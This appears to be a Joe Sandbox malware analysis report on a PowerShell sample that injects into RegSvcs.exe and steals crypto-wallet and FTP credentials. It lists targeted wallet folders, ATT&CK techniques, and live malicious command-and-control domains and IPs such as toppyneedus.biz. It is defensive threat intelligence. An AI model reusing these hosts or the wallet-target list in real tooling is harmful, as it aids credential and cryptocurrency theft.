      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
      Windows Management Instrumentation
      1
      DLL Side-Loading
      211
      Process Injection
      1
      Masquerading
      2
      OS Credential Dumping
      231
      Security Software Discovery
      Remote Services1
      Screen Capture
      21
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading
      231
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Process Discovery
      Remote Desktop Protocol1
      Archive Collected Data
      2
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)211
      Process Injection
      Security Account Manager231
      Virtualization/Sandbox Evasion
      SMB/Windows Admin Shares41
      Data from Local System
      113
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information
      NTDS1
      Application Window Discovery
      Distributed Component Object Model3
      Clipboard Data
      Protocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
      Obfuscated Files or Information
      LSA Secrets11
      File and Directory Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain Credentials32
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1600469 Sample: 176.113.115.225.ps1 Startdate: 27/01/2025 Architecture: WINDOWS Score: 100 18 grapeprivatter.cyou 2->18 20 twc.trafficmanager.net 2->20 22 7 other IPs or domains 2->22 26 Suricata IDS alerts for network traffic 2->26 28 Found malware configuration 2->28 30 Antivirus detection for URL or domain 2->30 32 5 other signatures 2->32 7 powershell.exe 20 26 2->7         started        signatures3 process4 signatures5 34 Query firmware table information (likely to detect VMs) 7->34 36 Found many strings related to Crypto-Wallets (likely being stolen) 7->36 38 Writes to foreign memory regions 7->38 40 Injects a PE file into a foreign processes 7->40 10 RegSvcs.exe 7->10         started        14 wermgr.exe 14 7->14         started        16 conhost.exe 7->16         started        process6 dnsIp7 24 toppyneedus.biz 104.21.29.142, 443, 49743, 49751 CLOUDFLARENETUS United States 10->24 42 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 10->42 44 Found many strings related to Crypto-Wallets (likely being stolen) 10->44 46 Tries to harvest and steal ftp login credentials 10->46 48 2 other signatures 10->48 signatures8

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      176.113.115.225.ps18%ReversingLabsWin32.Trojan.Generic
      176.113.115.225.ps111%VirustotalBrowse
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://toppyneedus.biz/it100%Avira URL Cloudmalware
      toppyneedus.biz100%Avira URL Cloudmalware
      https://toppyneedus.biz/N100%Avira URL Cloudmalware
      https://toppyneedus.biz/apiz100%Avira URL Cloudmalware
      suggestyuoz.biz100%Avira URL Cloudmalware
      grapeprivatter.cyou100%Avira URL Cloudmalware
      pleasedcfrown.biz100%Avira URL Cloudmalware
      http://www.microsoft.co-M10%Avira URL Cloudsafe
      lightdeerysua.biz100%Avira URL Cloudmalware
      affordtempyo.biz100%Avira URL Cloudmalware
      hoursuhouy.biz100%Avira URL Cloudmalware
      impolitewearr.biz100%Avira URL Cloudmalware
      mixedrecipew.biz100%Avira URL Cloudmalware
      https://toppyneedus.biz/apieB100%Avira URL Cloudmalware

      Download Network PCAP: filteredfull

      NameIPActiveMaliciousAntivirus DetectionReputation
      twc.trafficmanager.net
      104.40.149.189
      truefalse
        high
        toppyneedus.biz
        104.21.29.142
        truefalse
          high
          s-part-0017.t-0009.fb-t-msedge.net
          13.107.253.45
          truefalse
            high
            impolitewearr.biz
            unknown
            unknownfalse
              high
              grapeprivatter.cyou
              unknown
              unknowntrue
                unknown
                time.windows.com
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  suggestyuoz.biztrue
                  • Avira URL Cloud: malware
                  unknown
                  toppyneedus.biztrue
                  • Avira URL Cloud: malware
                  unknown
                  pleasedcfrown.biztrue
                  • Avira URL Cloud: malware
                  unknown
                  https://toppyneedus.biz/apifalse
                    high
                    grapeprivatter.cyoutrue
                    • Avira URL Cloud: malware
                    unknown
                    affordtempyo.biztrue
                    • Avira URL Cloud: malware
                    unknown
                    lightdeerysua.biztrue
                    • Avira URL Cloud: malware
                    unknown
                    impolitewearr.biztrue
                    • Avira URL Cloud: malware
                    unknown
                    mixedrecipew.biztrue
                    • Avira URL Cloud: malware
                    unknown
                    hoursuhouy.biztrue
                    • Avira URL Cloud: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1899446660.00000219BF5FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1878353723.00000219B0F80000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000000.00000002.1878353723.00000219B0C0E000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1878353723.00000219AF5A7000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1878353723.00000219AF5A7000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://go.micropowershell.exe, 00000000.00000002.1878353723.00000219B0558000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://contoso.com/Licensepowershell.exe, 00000000.00000002.1878353723.00000219B0F80000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://contoso.com/Iconpowershell.exe, 00000000.00000002.1878353723.00000219B0F80000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://upx.sf.netAmcache.hve.0.drfalse
                                    high
                                    https://toppyneedus.biz/itRegSvcs.exe, 00000003.00000002.1520897255.0000000003813000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.microsoft.co-M1powershell.exe, 00000000.00000002.1914181434.00000219C75E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://toppyneedus.biz/NRegSvcs.exe, 00000003.00000002.1520353981.0000000001205000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1878353723.00000219AF5A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://toppyneedus.biz/apizRegSvcs.exe, 00000003.00000002.1520897255.0000000003813000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://toppyneedus.biz/piRegSvcs.exe, 00000003.00000002.1520353981.0000000001205000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://contoso.com/powershell.exe, 00000000.00000002.1878353723.00000219B0F80000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1899446660.00000219BF5FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1878353723.00000219B0F80000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://oneget.orgXpowershell.exe, 00000000.00000002.1878353723.00000219B0C0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://toppyneedus.biz/RegSvcs.exe, 00000003.00000002.1520897255.0000000003813000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://aka.ms/pscore68powershell.exe, 00000000.00000002.1878353723.00000219AF381000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://toppyneedus.biz/apieBRegSvcs.exe, 00000003.00000002.1520290770.00000000011E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1878353723.00000219AF381000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://oneget.orgpowershell.exe, 00000000.00000002.1878353723.00000219B0C0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      104.21.29.142
                                                      toppyneedus.bizUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      Joe Sandbox version:42.0.0 Malachite
                                                      Analysis ID:1600469
                                                      Start date and time:2025-01-27 15:57:09 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 5m 45s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:11
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:176.113.115.225.ps1
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winPS1@6/10@4/1
                                                      EGA Information:
                                                      • Successful, ratio: 50%
                                                      HCA Information:
                                                      • Successful, ratio: 91%
                                                      • Number of executed functions: 43
                                                      • Number of non-executed functions: 60
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .ps1
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 20.42.73.29, 13.107.253.45, 40.126.31.67, 4.245.163.56
                                                      • Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target powershell.exe, PID 7816 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      TimeTypeDescription
                                                      09:58:18API Interceptor41x Sleep call for process: powershell.exe modified
                                                      09:58:19API Interceptor8x Sleep call for process: RegSvcs.exe modified
                                                      09:59:09API Interceptor1x Sleep call for process: wermgr.exe modified
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      104.21.29.142p199AjsEFs.exeGet hashmaliciousAmadey, AsyncRAT, KeyLogger, LummaC Stealer, PureLog Stealer, ReverseShell, StealcBrowse
                                                        2E02vIiMfd.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, VidarBrowse
                                                          grcKLMutRS.exeGet hashmaliciousLummaC StealerBrowse
                                                            2r81fhbT6k.exeGet hashmaliciousLummaC StealerBrowse
                                                              UK6dGWkIJK.exeGet hashmaliciousLummaC StealerBrowse
                                                                gQE0KK1bN8.exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
                                                                  #Ud835#Udc12#Ud835#Udc1e#Ud835#Udc2d-#Ud835#Udc2e#Ud835#Udc29.exeGet hashmaliciousLummaC StealerBrowse
                                                                    random.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog StealerBrowse
                                                                      cI34pCr.exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
                                                                        Setup.exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          twc.trafficmanager.netrandom.exeGet hashmaliciousSocks5SystemzBrowse
                                                                          • 104.40.149.189
                                                                          new.jsGet hashmaliciousUnknownBrowse
                                                                          • 20.101.57.9
                                                                          KgAMzi6gQA.exeGet hashmaliciousLummaCBrowse
                                                                          • 20.101.57.9
                                                                          8dm2CHOlmZ.ps1Get hashmaliciousUnknownBrowse
                                                                          • 104.40.149.189
                                                                          6O57pKpDUh.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                          • 104.40.149.189
                                                                          1737701406b64769aba6bf4e31e73b6a327f9369a2a4b8f163118530b67462ee0ccdc36063535.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                          • 20.101.57.9
                                                                          letsVPN.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.40.149.189
                                                                          Bank Slip pdf.exeGet hashmaliciousFormBookBrowse
                                                                          • 104.40.149.189
                                                                          Doc_874009379.vbeGet hashmaliciousAgentTeslaBrowse
                                                                          • 104.40.149.189
                                                                          oQXZhkSIys.exeGet hashmaliciousStrela StealerBrowse
                                                                          • 104.40.149.189
                                                                          s-part-0017.t-0009.fb-t-msedge.nethttp://wtsevent.comGet hashmaliciousTechSupportScamBrowse
                                                                          • 13.107.253.45
                                                                          PurchaseOrder.xlsGet hashmaliciousLokibotBrowse
                                                                          • 13.107.253.45
                                                                          NRKCZ1PSDM.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                          • 13.107.253.45
                                                                          Outstanding payment-pdf.htmGet hashmaliciousHTMLPhisherBrowse
                                                                          • 13.107.253.45
                                                                          Outstanding payment-pdf.htmGet hashmaliciousHTMLPhisherBrowse
                                                                          • 13.107.253.45
                                                                          W6735u7DZC.exeGet hashmaliciousCobaltStrikeBrowse
                                                                          • 13.107.253.45
                                                                          random.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 13.107.253.45
                                                                          Report 012425 Kcocpa.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 13.107.253.45
                                                                          Purchase Order 20887_;-.htmGet hashmaliciousHTMLPhisherBrowse
                                                                          • 13.107.253.45
                                                                          https://xjh7bk49.r.ap-southeast-2.awstrack.me/L0/https:%2F%2Fwww.google.co.in%2Furl%3Fsa==vjKpBaQLpQHvS1PmbhjfQh2MZOm%26rct=3iDDeRIUXr7S6LM6zidxN66zaYNJJZ5uNkn5rHJaI4t4qPP8DWVO1CvZVrepUv4LpX%26sa=t%26url=amp%2Fsouthdakotacannabisdoctors.com%2Fyes%2Fport%2FIsjR3uyjLQFu2NNvooFw2%2Fd2Zsb3JlbnRpbm9AZXNwZXJpb24uY29t/1/0108019498dc9698-c28d53cc-593c-4ccb-a609-76d243112b3f-000000/ABQm9rBJLVsJGlg3PuVXRXBptDI=191&c=E,1,evnTsmcgcysrNqkRD0O-1WQRUeSPuEJ91kARRfaRPYomDXM7_8LzuEjTBUwIOx_M1zJRuiZTdEHJwjdmV3XUzNtBsS-BHGDdMGwRIQxU57Nc5ykGet hashmaliciousHTMLPhisherBrowse
                                                                          • 13.107.253.45
                                                                          toppyneedus.biz4JPKDcwtDo.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 172.67.149.66
                                                                          p199AjsEFs.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                                                                          • 172.67.149.66
                                                                          VbEfsnL4cp.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 172.67.149.66
                                                                          2E02vIiMfd.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, VidarBrowse
                                                                          • 104.21.29.142
                                                                          grcKLMutRS.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 104.21.29.142
                                                                          4WzIkJRbcc.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 172.67.149.66
                                                                          2r81fhbT6k.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 104.21.29.142
                                                                          random.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 172.67.149.66
                                                                          UK6dGWkIJK.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 104.21.29.142
                                                                          gQE0KK1bN8.exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
                                                                          • 104.21.29.142
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          CLOUDFLARENETUShttps://click.cncemail.com/?qs=86f18f341c8c61df032f6c6c3cd614329c279ad56f8485ea453927ea8982eef94ab805237cc279d2bd164feb46dbf1a941f6590cf1e59115Get hashmaliciousUnknownBrowse
                                                                          • 104.19.171.40
                                                                          https://b1ds.gameorld.ru/o365-login-auth/Get hashmaliciousUnknownBrowse
                                                                          • 104.21.2.8
                                                                          https://www.google.pn/url?sa==a6bzuik1ma3dlpHqxRTACXaYHYI&rct=s7fFjO3jMe8ieQpeNofXnE7ZxaxKrm87scW4CKSzwd4Eiunz5jJ6j2AdElmCOMFCyq&sa=t&url=amp/s/deshshippinglines.com/demo/mode/IJulKkbhDRoCeYksSX62whnucNHhPavrd66HpTU/Z29ya2EuamltZW5lekBkZXZvbC5lcw==Get hashmaliciousUnknownBrowse
                                                                          • 188.114.97.3
                                                                          RFQ098765345678.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                          • 104.21.48.1
                                                                          https://drive.google.com/uc?export=download&id=1B8xr-NcyL1YnEEEgHxEPTw0fs4rDtuEfGet hashmaliciousUnknownBrowse
                                                                          • 104.18.187.31
                                                                          Scan_Documents_Request_PO.3748-00090127002025_specification_sample_catalogs.batGet hashmaliciousRemcosBrowse
                                                                          • 104.20.4.235
                                                                          VESSELS DOCUMENTS.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 104.21.112.1
                                                                          e2j0xn.ps1Get hashmaliciousFormBookBrowse
                                                                          • 172.67.179.56
                                                                          New purchase order.jseGet hashmaliciousFormBookBrowse
                                                                          • 172.67.179.56
                                                                          calculating.vbsGet hashmaliciousRemcosBrowse
                                                                          • 104.20.4.235
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          a0e9f5d64349fb13191bc781f81f42e1h226x41CQ6.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.29.142
                                                                          QuxHx2gOLI.exeGet hashmaliciousSmokeLoaderBrowse
                                                                          • 104.21.29.142
                                                                          New v2.2.0.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 104.21.29.142
                                                                          Installer.exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
                                                                          • 104.21.29.142
                                                                          A_acid11.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 104.21.29.142
                                                                          Loader.exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
                                                                          • 104.21.29.142
                                                                          4JPKDcwtDo.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 104.21.29.142
                                                                          p199AjsEFs.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                                                                          • 104.21.29.142
                                                                          VbEfsnL4cp.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 104.21.29.142
                                                                          2E02vIiMfd.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, VidarBrowse
                                                                          • 104.21.29.142
                                                                          No context
                                                                          Process:C:\Windows\System32\wermgr.exe
                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):65536
                                                                          Entropy (8bit):0.531881926582401
                                                                          Encrypted:false
                                                                          SSDEEP:96:yAF4jj5rxYidNRH3Uje0e35/3oo7p1QXIGZAX/d5FMT2SlPkpXmTAcf/VXT5NHBx:3slmGNR30mYAzuiFqZ24lO8
                                                                          MD5:254F9C40983BBF66DD4D599441E34E87
                                                                          SHA1:EFD13C2E406DC83D1172E64EFE01A732C7183D10
                                                                          SHA-256:41AEA0CA1960C23C0F124BA4665E9C70A02C1F1A9CF8AF130920413D2931DD10
                                                                          SHA-512:E52D9AEAA4BD094E8A3D712D18EE802ABCBC07D2CA3B50A6077F9DDE4EB66270162E63D0F07BE7761C99BAAC2F5287AAD92CB35C3C78D3208404F1CB19D7F05F
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.2.4.6.3.5.2.8.2.3.4.1.9.4.5.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.2.4.6.3.4.9.9.4.0.2.0.9.5.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.4.4.1.3.0.1.a.-.a.8.8.e.-.4.f.f.a.-.b.4.9.3.-.3.3.c.d.e.c.7.a.9.3.7.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.8.8.-.0.0.0.1.-.0.0.1.4.-.b.b.9.f.-.d.7.e.4.c.b.7.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.
                                                                          Process:C:\Windows\System32\wermgr.exe
                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):7284
                                                                          Entropy (8bit):3.735348400968557
                                                                          Encrypted:false
                                                                          SSDEEP:96:RSIU6o7wVetb4jQEXq6YkY7aULDEgmfHNpXErZn55aMWpm:R6l7wVeJ4jrq6YNa+DEgmftEZpWpm
                                                                          MD5:46D4987B77988FD35469EAF38B1683C2
                                                                          SHA1:62817AF8ED50F7CC9CC27A349011C0CB97D0C61F
                                                                          SHA-256:44A67B725D52B31E236227589FE66B76EB6335F0D01ABCF78851FF4F346D4353
                                                                          SHA-512:6497CF8A4B7BF3DD06C72C9FFDFE80478A33507F8DA650A1159058F377D066F5DE437A8E8DB7221E9EC7083DBDB798E1A7B59AAFA03A0C14668B50F938073F45
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.8.1.6.<./.P.i.
                                                                          Process:C:\Windows\System32\wermgr.exe
                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):4905
                                                                          Entropy (8bit):4.691974150507306
                                                                          Encrypted:false
                                                                          SSDEEP:96:uIjfKI7GP7VNJFKloFMMFl9wWTzFMMF0ufsd:uIeYGP7Z4cfcufS
                                                                          MD5:781FB32B23CED1AD8BC4BF07F91E6B8E
                                                                          SHA1:C3688E35C5DA6BB1F07FE6744C56000CFD52A09C
                                                                          SHA-256:60FE7022A6DF9A06CC5C405AC1CAE25555DF3DB7635A30953C2836406FEA92E2
                                                                          SHA-512:188E8C5FF577259975BE42CB3996A68B58876E2AD976BFA367F81D6EAF4CEAB578668A2A0324209FEFAA1BF19B66A3CDA726F1F999C1FE7F826EC1E924A1884F
                                                                          Malicious:false
                                                                          Reputation:low
